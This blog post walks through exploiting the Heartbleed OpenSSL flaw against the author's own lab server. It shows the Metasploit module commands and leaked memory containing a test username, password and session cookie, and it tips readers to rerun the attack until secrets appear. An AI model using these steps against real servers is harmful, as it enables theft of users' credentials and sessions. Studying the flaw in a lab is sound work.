Heartbleed – Do it yourself

heartbleedPlaying around with heartbleed this morning, I reused my old vulnerable host, and create a super simple php login w/session script, to see how easy it was to exploit it.
To easy…

One visit to my heartbleed.php, (witch runs 20 login attempts to same url in the background), and make it even more oblivious logging in with openssl/heartbleed before heading over to kali / metasploit.

msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set RHOSTS 10.0.2.55
RHOSTS => 10.0.2.55
msf auxiliary(openssl_heartbleed) > set RPORT 443
RPORT => 443
msf auxiliary(openssl_heartbleed) > set VERBOSE true
VERBOSE => true
msf auxiliary(openssl_heartbleed) > run

Response from the automatic curl login:

[*] 10.0.2.55:443 – Printable info leaked: @SK>#D/f”!98532ED/AContent-Type: application/x-www-form-urlencodedusername=openssl&password=heartbleed_a.CWh>K”

Respons from logging in via the webgui as a proper user:

[*] 10.0.2.55:443 – Printable info leaked: @SK6+h6mULg>W-f”!98532ED/Ahtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://10.0.2.55User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: https://10.0.2.55/index.phpAccept-Encoding: gzip,deflate,sdchAccept-Language: nb,en-US;q=0.8,en;q=0.6,nn;q=0.4Cookie: PHPSESSID=m8307909fp3l4ie5lqei43cee7DNT: 1username=openssl&password=heartbleed&submit=Login.;rI2+5Hq

That’s how easy you can get the username/password or the session key….

Try it for yourself? heartbleed.phps

Last tip: rerun it multiple times, until you get the respond you want, remember you are getting random parts from memory from the vulnerable host.

Leave a Comments